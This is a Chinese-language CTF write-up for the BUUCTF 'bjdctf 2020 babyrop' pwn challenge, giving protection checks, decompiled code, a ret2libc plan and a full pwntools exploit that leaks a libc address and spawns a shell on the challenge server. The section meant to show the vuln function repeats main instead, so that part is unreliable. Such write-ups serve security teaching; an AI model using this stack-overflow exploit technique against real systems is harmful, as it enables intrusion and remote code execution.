bjdctf 2020 babyrop
# bjdctf 2020 babyrop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();
vuln();
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
vuln函数及函数表如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);
vuln();
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
# 思路分析
目前信息:
vuln函数内明显的栈溢出漏洞- No PIE
- NX 保护开启
- 无后门函数
思路:
- 本题是标准的
ret2libc,应先泄漏libc及函数地址,再利用泄漏的信息构造payload,执行获取shell
- 本题是标准的
# exp
from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
io = remote('node4.buuoj.cn', 28461)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x24+4
libc_start_main_addr = elf.got['__libc_start_main']
puts_addr = elf.plt['puts']
vuln_addr = elf.symbols['vuln']
pop_rdi_ret = 0x400733
payload = flat(['a'*padding, pop_rdi_ret,libc_start_main_addr, puts_addr, vuln_addr])
io.sendlineafter('me u story!\n', payload)
leak_libc_start_main_addr = u64(io.recv(6).ljust(8, b'\x00'))
libc = LibcSearcher('__libc_start_main', leak_libc_start_main_addr)
libcbase = leak_libc_start_main_addr-libc.dump('__libc_start_main')
system_addr = libcbase+libc.dump('system')
bin_sh_addr = libcbase+libc.dump('str_bin_sh')
payload = flat(['a'*padding, pop_rdi_ret, bin_sh_addr, system_addr])
io.sendlineafter('u story!\n', payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
上次更新: 2022/08/15, 00:29:49